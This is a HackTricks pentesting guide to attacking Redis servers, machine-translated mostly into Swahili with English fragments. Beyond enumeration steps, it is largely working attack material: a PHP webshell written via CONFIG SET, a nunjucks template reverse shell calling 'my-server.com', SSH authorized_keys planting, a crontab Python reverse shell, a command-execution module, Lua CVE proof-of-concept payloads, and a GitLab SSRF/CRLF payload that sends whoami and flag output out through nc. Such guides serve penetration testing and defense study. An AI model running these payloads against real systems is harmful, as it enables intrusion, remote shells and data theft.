6379 - Pentesting Redis

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Taarifa za Msingi

From the docs: Redis ni chanzo wazi (chini ya leseni ya BSD), katika kumbukumbu data structure store, inayotumika kama database, cache na message broker).

Kwa chaguo-msingi Redis hutumia protocol ya msingi wa maandishi wazi, lakini ni muhimu kukumbuka kwamba inaweza pia kutekeleza ssl/tls. Jifunze jinsi ya run Redis with ssl/tls here.

Bandari ya default: 6379

PORT     STATE SERVICE  VERSION
6379/tcp open  redis   Redis key-value store 4.0.9

Uorodheshi wa Kiotomatiki

Baadhi ya zana za kiotomatiki ambazo zinaweza kusaidia kupata taarifa kutoka kwa instance ya redis:

nmap --script redis-info -sV -p 6379 <IP>
msf> use auxiliary/scanner/redis/redis_server

Manual Enumeration

Banner

Redis ni protokoli inayotegemea maandishi, unaweza tu kutuma amri kwenye socket na thamani zinazorejeshwa zitakuwa za kusomwa. Pia kumbuka kwamba Redis inaweza kuendesha kwa kutumia ssl/tls (lakini hii ni ya ajabu sana).

Katika mfano wa kawaida wa Redis unaweza tu kuungana kwa kutumia nc au unaweza pia kutumia redis-cli:

nc -vn 10.10.10.10 6379
redis-cli -h 10.10.10.10 # sudo apt-get install redis-tools

Amri ya kwanza unayoweza kujaribu ni info. Inaweza kurudisha pato lenye taarifa za Redis instance au kitu kama hicho, mfano kifuatacho kinarudishwa:

-NOAUTH Authentication required.

Katika kesi ya mwisho, hili linamaanisha kwamba unahitaji cheti halali ili kupata ufikiaji wa instance ya Redis.

Uthibitishaji wa Redis

Kwa chaguo-msingi Redis inaweza kupatikana bila cheti. Hata hivyo, inaweza ku sanidiwa ili kuunga mkono nywila tu, au username + nywila.
Inawezekana kusanidi nywila katika faili redis.conf kwa kutumia parameter requirepass au kwa muda hadi huduma ianzishwe tena kwa kuunganishwa nayo na kuendesha: config set requirepass p@ss$12E45.
Pia, username inaweza kusanidiwa katika parameter masteruser ndani ya faili redis.conf.

Tip

Ikiwa nywila pekee imewekwa basi jina la mtumiaji litakayotumika ni “default”.
Pia, kumbuka kwamba hakuna njia ya kugundua kutoka nje ikiwa Redis ilisanidiwa na nywila pekee au username+nywila.

Katika kesi kama hii utahitaji kupata cheti halali ili kuingiliana na Redis, hivyo unaweza kujaribu brute-force kuifanya.
Ikiwa umepata cheti halali unahitaji kuthibitisha kikao baada ya kuanzisha muunganisho kwa amri:

AUTH <username> <password>

Valid credentials jibu litakuwa: +OK

Authenticated enumeration

Ikiwa server ya Redis inaruhusu anonymous connections au ikiwa umepata valid credentials, unaweza kuanza mchakato wa enumeration kwa huduma kwa kutumia commands zifuatazo:

INFO
[ ... Redis response with info ... ]
client list
[ ... Redis response with connected clients ... ]
CONFIG GET *
[ ... Get config ... ]

Amri zingine za Redis can be found here na here.

Kumbuka kwamba amri za Redis za instance zinaweza kubadilishwa au kuondolewa katika faili redis.conf. Kwa mfano, mstari huu utaondoa amri FLUSHDB:

rename-command FLUSHDB ""

Taarifa zaidi kuhusu jinsi ya kusanidi kwa usalama huduma ya Redis hapa: https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-redis-on-ubuntu-18-04

Unaweza pia kuangalia kwa wakati halisi amri za Redis zinazotekelezwa kwa kutumia amri monitor au kupata maulizo 25 ya polepole zaidi kwa kutumia slowlog get 25

Pata taarifa zaidi kuhusu amri za Redis hapa: https://lzone.de/cheat-sheet/Redis

Kutoa Hifadhidata

Ndani ya Redis, hifadhidata zimetambulishwa kwa namba kuanzia 0. Unaweza kuona ikiwa zimetumika katika matokeo ya amri info ndani ya sehemu ya “Keyspace”:

Au unaweza pia kupata keyspaces (hifadhidata) zote kwa:

INFO keyspace

Katika mfano huo database 0 and 1 zinatumika. Database 0 contains 4 keys and database 1 contains 1. Kwa kawaida Redis itatumia database 0. Ili ku-dump kwa mfano database 1 unahitaji kufanya:

SELECT 1
[ ... Indicate the database ... ]
KEYS *
[ ... Get Keys ... ]
GET <KEY>
[ ... Get Key ... ]

Iwapo utapata kosa lifuatalo -WRONGTYPE Operation against a key holding the wrong kind of value unapotekeleza GET <KEY>, ni kwa sababu ufunguo unaweza kuwa aina nyingine tofauti na string au integer na unahitaji operator maalum ili kuonyesha.

Ili kujua aina ya ufunguo, tumia amri ya TYPE; mfano hapa chini kwa ufunguo za list na hash.

TYPE <KEY>
[ ... Type of the Key ... ]
LRANGE <KEY> 0 -1
[ ... Get list items ... ]
HGET <KEY> <FIELD>
[ ... Get hash item ... ]

# If the type used is weird you can always do:
DUMP <key>

Dondosha hifadhidata kwa kutumia npm redis-dump au python redis-utils

Redis RCE

Interactive Shell

redis-rogue-server inaweza kupata interactive shell au reverse shell moja kwa moja katika Redis(<=5.0.5).

./redis-rogue-server.py --rhost <TARGET_IP> --lhost <ACCACKER_IP>

PHP Webshell

Taarifa kutoka here. Lazima ujue njia ya folda ya tovuti:

root@Urahara:~# redis-cli -h 10.85.0.52
10.85.0.52:6379> config set dir /usr/share/nginx/html
OK
10.85.0.52:6379> config set dbfilename redis.php
OK
10.85.0.52:6379> set test "<?php phpinfo(); ?>"
OK
10.85.0.52:6379> save
OK

Ikiwa upatikanaji wa webshell umeshindwa, unaweza kufuta database baada ya kufanya backup kisha ujaribu tena; kumbuka kurejesha database.

Template Webshell

Kama katika sehemu iliyopita unaweza pia kuandika juu faili ya template ya html ambayo itatafsiriwa na template engine na kupata shell.

Kwa mfano, ukifuata this writeup, utaona kwamba mshambuliaji aliingiza rev shell in an html ambayo inatafsiriwa na nunjucks template engine:

{{ ({}).constructor.constructor(
"var net = global.process.mainModule.require('net'),
cp = global.process.mainModule.require('child_process'),
sh = cp.spawn('sh', []);
var client = new net.Socket();
client.connect(1234, 'my-server.com', function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});"
)()}}

Warning

Kumbuka kwamba mashine kadhaa za template hufanya cache template kwenye kumbukumbu, hivyo hata ukizibadilisha, mpya haitatekelezwa. Katika kesi hizi, ama developer ameacha automatic reload ikawa hai au unahitaji kufanya DoS kwa service (na kutegemea kwamba itarejeshwa moja kwa moja).

SSH

Mfano from here

Tafadhali fahamu kwamba matokeo ya config get dir yanaweza kubadilishwa baada ya amri nyingine za exploit zilizotekelezwa kwa mkono. Inashauriwa kuendesha kwanza mara tu baada ya kuingia kwenye Redis. Katika matokeo ya config get dir unaweza kupata home ya redis user (kwa kawaida /var/lib/redis au /home/redis/.ssh), na ukijua hiyo unajua wapi unaweza kuandika faili authenticated_users ili kupata ufikiaji kwa ssh kwa user redis. Ikiwa unajua home ya user mwingine halali ambapo una ruhusa za kuandika, pia unaweza kuitumia vibaya:

1. Tengeneza jozi ya ufunguo wa umma-na-siri wa ssh kwenye PC yako: ssh-keygen -t rsa
2. Andika ufunguo wa umma katika faili : (echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt
3. Ingiza faili kwenye redis : cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key
4. Hifadhi ufunguo wa umma kwenye faili authorized_keys kwenye server ya redis:

root@Urahara:~# redis-cli -h 10.85.0.52
10.85.0.52:6379> config set dir /var/lib/redis/.ssh
OK
10.85.0.52:6379> config set dbfilename "authorized_keys"
OK
10.85.0.52:6379> save
OK

5. Hatimaye, unaweza ssh kwenda kwenye redis server kwa kutumia ufunguo wa siri : ssh -i id_rsa redis@10.85.0.52

Mbinu hii imefanywa kiotomatiki hapa: https://github.com/Avinash-acid/Redis-Server-Exploit

Zaidi ya hayo, watumiaji wa mfumo pia wanaweza kugunduliwa kwa kuchunguza kwa kutumia config set dir /home/USER, na baada ya uthibitisho, authorized_keys mpya inaweza kuandikwa katika /home/USER/.ssh/authorized_keys. Tumia redis-rce-ssh kufanya bruteforce hii kwa orodha ya majina ya watumiaji na kuandika juu authorized_keys.

Crontab

root@Urahara:~# echo -e "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.85.0.53\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"|redis-cli -h 10.85.0.52 -x set 1
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dir /var/spool/cron/crontabs/
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dbfilename root
OK
root@Urahara:~# redis-cli -h 10.85.0.52 save
OK

The last example is for Ubuntu, for Centos, the above command should be: redis-cli -h 10.85.0.52 config set dir /var/spool/cron/

This method can also be used to earn bitcoin ：yam

Load Redis Module

1. Following the instructions from https://github.com/n0b0dyCN/RedisModules-ExecuteCommand you can compile a redis module to execute arbitrary commands.
2. Then you need some way to upload the compiled module
3. Load the uploaded module at runtime with MODULE LOAD /path/to/mymodule.so
4. List loaded modules to check it was correctly loaded: MODULE LIST
5. Execute commands:

127.0.0.1:6379> system.exec "id"
"uid=0(root) gid=0(root) groups=0(root)\n"
127.0.0.1:6379> system.exec "whoami"
"root\n"
127.0.0.1:6379> system.rev 127.0.0.1 9999

6. Unload the module whenever you want: MODULE UNLOAD mymodule

LUA sandbox bypass

Here unaweza kuona kwamba Redis inatumia amri EVAL kutekeleza Lua code ndani ya sandbox. Katika chapisho lililounganishwa unaweza kuona jinsi ya kuitumia vibaya kwa kutumia function ya dofile, lakini apparently hili sasa haionekani kuwa linawezekana tena. Hata hivyo, ikiwa unaweza kupita sandbox ya Lua unaweza kutekeleza amri zozote kwenye mfumo. Pia, kutoka chapisho hilo unaweza kuona baadhi ya mbinu za kusababisha DoS.

Some CVEs to escape from LUA:

• https://github.com/aodsec/CVE-2022-0543

Redis Lua Scripting Engine: Sandbox Escapes & Memory Corruption (CVE-2025-49844/46817/46818)

Recent Redis releases fixed multiple issues in the embedded Lua engine that allow sandbox escape, memory corruption and cross-user code execution. These techniques apply when:

• Mshambuliaji anaweza kuthibitisha kwenye Redis na Lua imewezeshwa (EVAL/EVALSHA au FUNCTION zinapatikana)
• Redis version is older than 8.2.2, 8.0.4, 7.4.6, 7.2.11, or 6.2.20

Tip: If you are new to Lua sandboxing tricks, check this page for general techniques:

Lua Sandbox Escape

Patch-level context:

• Fixed in: 8.2.2, 8.0.4, 7.4.6, 7.2.11, 6.2.20
• Affected when Lua scripting is enabled and the above versions are not applied

CVE-2025-49844 — GC-timed Use-After-Free in Lua parser (lparser.c: luaY_parser)

• Idea: Force garbage collection while the parser still references a freshly-inserted TString. When GC reclaims it, the parser uses a freed pointer (UAF) → crash/DoS and potential native code execution outside the Lua sandbox.
• Trigger strategy:

1. Create memory pressure with huge strings to encourage GC activity
2. Explicitly run GC while a large source chunk is being compiled
3. Compile a very large Lua script in a loop until GC aligns with parsing

Minimal EVAL harness to reproduce crashes

# Auth as needed (-a/--user), then run EVAL with 0 keys
redis-cli -h <host> -p 6379 -a <password> EVAL "\
local a = string.rep('asdf', 65536); \
collectgarbage('collect'); \
local src = string.rep('x', 1024 * 1024); \
local f = loadstring(src); \
return 'done'" 0

Vidokezo:

• Jaribio nyingi zinaweza kuhitajika kuoanisha GC na luaY_parser. Kuanguka kunadhihirisha UAF iligusiwa.
• Kutoka exploitation hadi RCE kunahitaji memory grooming na native code pivoting nje ya Redis Lua sandbox.

CVE-2025-46817 — Kuvuka kwa integer katika unpack (lbaselib.c: luaB_unpack)

• Chanzo msingi: Idadi n = e - i + 1 huhesabiwa bila kutumia unsigned casts, hivyo indices za mbali zinazunguka, na kusababisha Lua kujaribu ku-unpack elementi nyingi zaidi kuliko zilizopo → stack corruption na memory exhaustion.
• PoC (DoS/mem exhaustion):

redis-cli -h <host> -p 6379 -a <password> EVAL "return unpack({'a','b','c'}, -1, 2147483647)" 0

• Tarajia server kujaribu kurudisha idadi kubwa sana ya values na hatimaye crash au OOM.

CVE-2025-46818 — Cross-user privilege escalation via basic type metatables

• Sababu ya mzizi: Wakati wa engine initialization, metatables za basic types (e.g., strings, booleans) hazikuwekwa kuwa read-only. Mtumiaji yeyote aliye authenticated anaweza kuzichafua (poison) ili kuingiza methods ambazo watumiaji wengine wanaweza kuitisha baadaye.
• Mfano (string metatable poisoning):

# Inject a method on strings and then exercise it
redis-cli -h <host> -p 6379 -a <password> EVAL "\
getmetatable('').__index = function(_, key) \
if key == 'testfunc' then \
return function() return 'testfuncoutput' end \
end \
end; \
return ('teststring').testfunc()" 0
# → Returns: testfuncoutput

• Impact: Utekelezaji wa msimbo kati ya watumiaji ndani ya sandbox ya Lua kwa kutumia ruhusa za Redis za mwathiriwa. Inafaa kwa lateral movement/priv-esc ndani ya muktadha wa Redis ACL contexts.

Master-Slave Module

Operesheni zote za master Redis zinasawazishwa moja kwa moja na slave Redis, ambayo ina maana tunaweza kuchukulia Redis iliyo na udhaifu kama slave Redis iliyounganishwa na master Redis tunayodhibiti; kisha tunaweza kuingiza amri kwenye Redis yetu.

master redis : 10.85.0.51 (Hacker's Server)
slave  redis : 10.85.0.52 (Target Vulnerability Server)
A master-slave connection will be established from the slave redis and the master redis:
redis-cli -h 10.85.0.52 -p 6379
slaveof 10.85.0.51 6379
Then you can login to the master redis to control the slave redis:
redis-cli -h 10.85.0.51 -p 6379
set mykey hello
set mykey2 helloworld

SSRF kuwasiliana na Redis

Ikiwa unaweza kutuma maombi ya clear text kwa Redis, unaweza kuwasiliana nayo kwani Redis itasoma ombi mstari kwa mstari na itajibu kwa makosa tu kwa mistari ambayo haielewi:

-ERR wrong number of arguments for 'get' command
-ERR unknown command 'Host:'
-ERR unknown command 'Accept:'
-ERR unknown command 'Accept-Encoding:'
-ERR unknown command 'Via:'
-ERR unknown command 'Cache-Control:'
-ERR unknown command 'Connection:'

Kwa hiyo, ikiwa utapata SSRF vuln kwenye tovuti na unaweza dhibiti baadhi ya headers (labda kwa CRLF vuln) au POST parameters, utaweza kutuma amri za hiari kwa Redis.

Mfano: Gitlab SSRF + CRLF to Shell

Kwenye Gitlab11.4.7 iligunduliwa udhaifu wa SSRF na CRLF. Udhaifu wa SSRF ulikuwa katika import project from URL functionality wakati wa kuunda project mpya na ulicheruhusu kufikia IP yoyote kwa muundo [0:0:0:0:0:ffff:127.0.0.1] (hii itafikia 127.0.0.1), na CRLF vuln ilitumiwa kwa tu kuongeza %0D%0A characters kwenye URL.

Kwa hivyo, ilikuwa inawezekana kutumia vibaya udhaifu huu kuzungumza na Redis instance ambayo inadhibiti queues za gitlab na kutumia vibaya queues hizo ili kupata code execution. Redis queue abuse payload ni:

multi
sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|whoami | nc 192.241.233.143 80\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
exec

Na ombi la URL encode abusing SSRF na CRLF ili kutekeleza whoami na kurudisha pato kupitia nc ni:

git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20127%2E0%2E0%2E1%202222%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf123321.git

Kwa sababu fulani (kama kwa mwandishi wa https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/ ambapo taarifa hii ilichukuliwa) exploitation ilifanya kazi kwa git scheme na sio kwa http scheme.

Marejeo

• Recent Vulnerabilities in Redis Server’s Lua Scripting Engine (OffSec)
• NVD: CVE-2025-49844
• NVD: CVE-2025-46817
• NVD: CVE-2025-46818
• Wiz analysis of Redis RCE (CVE-2025-49844)
• PoC: CVE-2025-49844 — Lua parser UAF
• PoC: CVE-2025-46817 — unpack integer overflow
• PoC: CVE-2025-46818 — basic-type metatable abuse

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.